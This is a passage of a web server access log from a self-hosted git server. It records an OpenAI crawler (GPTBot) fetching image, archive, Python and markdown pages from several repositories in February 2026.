+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" -[17/Feb/2026:13:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" -[17/Feb/2026:13:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" -[17/Feb/2026:13:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" -[17/Feb/2026:13:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" -[17/Feb/2026:13:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" -[17/Feb/2026:13:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" -[17/Feb/2026:13:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10206] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" -[17/Feb/2026:13:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 36014] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 36009] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" [Client 74.7.227.38] [Length 10286] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692337] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699389] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641762] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508445] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641794] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699379] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14174] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14141] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" -[17/Feb/2026:13:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" [Client 74.7.227.38] [Length 10723] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" -[17/Feb/2026:13:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10905] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12204] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14170] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10897] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12199] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14171] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66161] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71969] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" -[17/Feb/2026:13:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 